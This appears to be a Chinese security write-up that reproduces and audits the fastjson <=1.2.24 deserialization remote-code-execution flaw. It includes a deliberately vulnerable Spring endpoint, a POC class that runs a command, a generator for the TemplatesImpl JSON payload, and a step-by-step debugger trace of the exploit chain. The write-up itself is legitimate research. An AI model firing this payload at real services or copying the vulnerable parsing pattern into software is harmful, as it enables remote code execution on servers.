Fastjson<=1.2.24漏洞复现

1 漏洞描述

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

2 受影响版本

fastjson<=1.2.24

3 漏洞验证

0

4 复现环境

jdk1.8+fastjson1.2.24
使用springboot搭建复现环境
project
maven依赖:

  1. <dependency>
  2. <groupId>com.alibaba</groupId>
  3. <artifactId>fastjson</artifactId>
  4. <version>1.2.24</version>
  5. </dependency>

web代码片段

  1. @PostMapping("/fastjson")
  2. public JSONObject reflectHole(HttpServletRequest request) throws IOException {
  3. String data = WebUtil.getRequestBody(request);
  4. return JSON.parseObject(data, Feature.SupportNonPublicField);
  5. }

5 审计分析

5.1 流程分析

流程分析

5.2 代码分析

5.2.1 fastjson介绍及使用

fastjson`是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。
以下是序列化操作和反序列化操作需要的函数

| 函数 | 作用 | | —- | —- |

|

| |

| JSON.toJSONString(Object,SerializerFeature.WriteClassName) | 将对象序列化成json格式,并且记录了对象所属的类的信息 |

| JSON.parse(Json) | 将json格式返回为对象(但是反序列化类对象没有@Type时会报错) |

| JSON.parseObject(Json) | 返回对象是com.alibaba.fastjson.JSONObject类 |

| JSON.parseObject(Json, Object.class) | 返回对象会根据json中的@Type来决定 |

| JSON.parseObject(Json, Feature.SupportNonPublicField); | 会把Json数据对应的类中的私有成员也给还原 |

User.java代码

  1. package fxlh.fastjson;
  2. import com.alibaba.fastjson.JSONObject;
  3. public class User{
  4. private Long id;
  5. private String name;
  6. //增加get/set方法
  7. public Long getId() { return id; }
  8. public void setId(Long id) { this.id = id; }
  9. public String getName() { return name; }
  10. public void setName(String name) { this.name = name; }
  11. }

fastjson使用演示

  1. package fxlh.fastjson;
  2. import com.alibaba.fastjson.JSON;
  3. import com.alibaba.fastjson.parser.Feature;
  4. import com.alibaba.fastjson.serializer.SerializerFeature;
  5. public class Test {
  6. public static void main(String[] args) {
  7. User guestUser = new User();
  8. guestUser.setId(1L);
  9. guestUser.setName("root");
  10. //将java对象序列化为json对象
  11. String jsonString1 = JSON.toJSONString(guestUser);
  12. System.out.println("Json对象:" + jsonString1);
  13. String ser2 = JSON.toJSONString(guestUser, SerializerFeature.WriteClassName);
  14. System.out.println(ser2);
  15. System.out.println("==============");
  16. //将json反序列化为java对象
  17. String jsonString2 = "{\"id\":2,\"name\":\"root\"}";
  18. //如果使用下面的json数据进行反序列化,user类必须继承JsonObject类或其子类
  19. // String jsonString2 = "{\"@type\":\"fxlh.fastjson.User\",\"id\":1,\"name\":\"guest\"}";
  20. User user = JSON.parseObject(jsonString2, User.class);
  21. //打印变量类型
  22. System.out.println(user);
  23. Object demo2User4 = JSON.parseObject(jsonString2, Feature.SupportNonPublicField);
  24. System.out.println(demo2User4);
  25. }
  26. }

输出结果:

Json对象:{“id”:1,”name”:”root”}

{“@type”:”fxlh.fastjson.User”,”id”:1,”name”:”root”}

==============

fxlh.fastjson.User3581c5f3
{“name”:”root”,”id”:2}

对于 fastjson版本 <= 1.2.24的情况,利用思路主要有2种

  • 通过触发点JSON.parseObject()这个函数,将json中的类设置成com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl并通过特意构造达到命令执行
  • 通过JNDI注入
    5.2.2 POC准备
    POC.java文件 ``` package fxlh.fastjson;

import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xsltc.TransletException; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

/**

  • @Author: white_xiaosheng
  • @Description: TODO
  • @CreateTime: 2021/1/17 2:07 下午
  • @Version 1.0 */ public class POC extends AbstractTranslet {

    public POC() throws IOException {

    1. Runtime.getRuntime().exec("open /Applications/Calculator.app");

    }

    @Override public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) { }

    @Override public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] haFndlers) throws TransletException {

    }

    public static void main(String[] args) throws Exception {

    1. POC fastjsonPoc = new POC();

    } }

  1. 生成payload的代码示例

package fxlh.fastjson;

import java.io.*; import java.util.Base64;

/**

  • @Author: white_xiaosheng
  • @Description: TODO
  • @CreateTime: 2021/1/17 2:22 下午
  • @Version 1.0 */ public class ByteBuildByClassFile { public static void main(String[] args) throws IOException {

    1. // poc的文件夹位置
    2. String pocDirPath = "";
    3. Runtime runtime = Runtime.getRuntime();
    4. runtime.exec(new String[]{"/bin/bash", "-c", "cd "+pocDirPath+" && javac POC.java"});
    5. FileInputStream fileInputStream = new FileInputStream(new File(pocDirPath+"POC.class"));
    6. int len = fileInputStream.available();
    7. byte[] bytes = new byte[len];
    8. fileInputStream.read(bytes);
    9. String json = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\""+ Base64.getEncoder().encodeToString(bytes)+"\"],\"_name\":\"a.b\",\"_tfactory\":{ },\"_outputProperties\":{ },\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}";
    10. System.out.println(json);

    } }

  1. ##### 5.2.3 **重要断点设置**
  2. com.alibaba.fastjson.JSON.java
  3. - `return parse(text, featureValues);`
  4. - `Object value = parser.parse();`
  5. com.alibaba.fastjson.parser.DefaultJSONParser.java
  6. - `return parseObject(object, fieldName);`
  7. - `return deserializer.deserialze(this, clazz, fieldName);`
  8. com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.java
  9. - `return deserialze(parser, type, fieldName, null, features);`
  10. - `boolean match = parseField(parser, key, object, type, fieldValues);`
  11. com.alibaba.fastjson.parser.deserializer.DefaultFieldDeserializer.java
  12. - `setValue(object, value);`
  13. - `value = javaBeanDeser.deserialze(parser, fieldType, fieldInfo.name, fieldInfo.parserFeatures);`
  14. - `value = fieldValueDeserilizer.deserialze(parser, fieldType, fieldInfo.name);`
  15. com/alibaba/fastjson/parser/JSONScanner.java
  16. - `return IOUtils.decodeBase64(text, np + 1, sp);`
  17. com.alibaba.fastjson.parser.deserializer.FieldDeserializer.java
  18. - `Method method = fieldInfo.method;`
  19. - `field.set(object, value);`
  20. - `Map map = (Map) method.invoke(object);`
  21. com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.java
  22. - `return newTransformer().getOutputProperties();`
  23. - `transformer = new TransformerImpl(getTransletInstance(), _outputProperties, _indentNumber, _tfactory);`
  24. - `if (_class == null) defineTransletClasses();`
  25. - `TransletClassLoader loader = (TransletClassLoader)`
  26. - `_class[i] = loader.defineClass(_bytecodes[i]);`
  27. - `AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].getConstructor().newInstance();`
  28. ##### 5.2.4 **数据流分析**
  29. 首先在自己的项目中打一个断点观察入口,这个漏洞利用方法必须要存在`Feature.SupportNonPublicField`设置(即允许private对象传入)<br />![1](https://cdn.nlark.com/yuque/0/2022/png/2857250/1648045948027-66e5435b-b6bd-4088-b0fc-52fe90d435a4.png)<br />可以一层一层的追踪数据流到这一步也可以根据断点设置直接跳到下一个断点<br />![2](https://cdn.nlark.com/yuque/0/2022/png/2857250/1648045948148-4111eabc-322c-402f-84a9-02b8caebb051.png)<br />这个可以看到调用fastjson的DefaultJSONParser解析器解析<br />![3](https://cdn.nlark.com/yuque/0/2022/png/2857250/1648045948239-c7c882c0-427d-4082-861a-40ecc32f5d8e.png)<br />之后进入`DeafultJSONParser.java`通过switch判断,进入到`LBRACE`中<br />![4](https://cdn.nlark.com/yuque/0/2022/png/2857250/1648045948333-b55c8a9c-502f-4da1-a947-8f29682a9098.png)<br />进入下一个断点,config.getDeserializer(type);这个方法是根据入参类型获得反序列化器,然后执行反序列化操作<br />![5](https://cdn.nlark.com/yuque/0/2022/png/2857250/1648045948411-b3d4e79f-1612-47ff-9a38-1615bd0ed6ae.png)<br />进入了`JavaBeanDeserializer.java`中,这段主要是进行反序列化操作,这里可以看到传递过来的type类型<br />![](https://cdn.nlark.com/yuque/0/2022/png/2857250/1648045948494-529ba312-9371-4fe7-b781-0223b81241b7.png)<br />跟入deserialze方法中,观察`_bytecodes`的数据,最后发现JSONScanner类会对_`_bytescodes`变量值执行base64解码操作。<br />![xx](https://cdn.nlark.com/yuque/0/2022/png/2857250/1648045948572-1a7d12a4-d1b7-49b1-8178-96c515320f8c.png)<br />跟入下一个断点,进入到了FieldDeserializer.java中,setValue这个函数主要是给object类装配参数数据,第一次装配的是解码过的_bytecode参数值<br />![7](https://cdn.nlark.com/yuque/0/2022/png/2857250/1648045948714-7d80157a-e0de-42ea-a1f4-dfbce12353cf.png)<br />跟进setValue函数,查看其具体逻辑实现

/* 查看传递过来的value值的属性是方法(method)还是字段(field)属性,fieldinfo记录着value的属性信息,如果是method属性则通过反射实现该方法逻辑,如果不存在method属性存在field属性,则通过field.set(object,value)方法将传递的value值存放到object类的字段中(该类是TemplatesImpl类,即poc中的type字段) */ public void setValue(Object object, Object value) { … Method method = fieldInfo.method; if (method != null) { … Map map = (Map) method.invoke(object); … }else{ final Field field = fieldInfo.field; … field.set(object, value); } }

``` 其数据流如下
8
9
继续跟进断点查看数据流
10
11
根据跟进,直到执行到method.invoke(object),这一步的执行完就可以根据poc触发漏洞。
13
为什么这个poc可以触发漏洞呢?跟进TemplatesImpl类观察逻辑,根据断点进入getOutputProperties方法
14
再跟进newTransformer方法
15
再跟进getTransletInstance方法,当传递的json数据未设置_class参数时,会进入defineTransletClasses()方法,重新定义类
16
继续跟进defineTransletClasses方法,根据_bytecodes定义一个新的类,这也是代码执行的关键所在17
跟入下一个断点,执行该断点将会触发POC.class的代码内容,成功触发计算器
18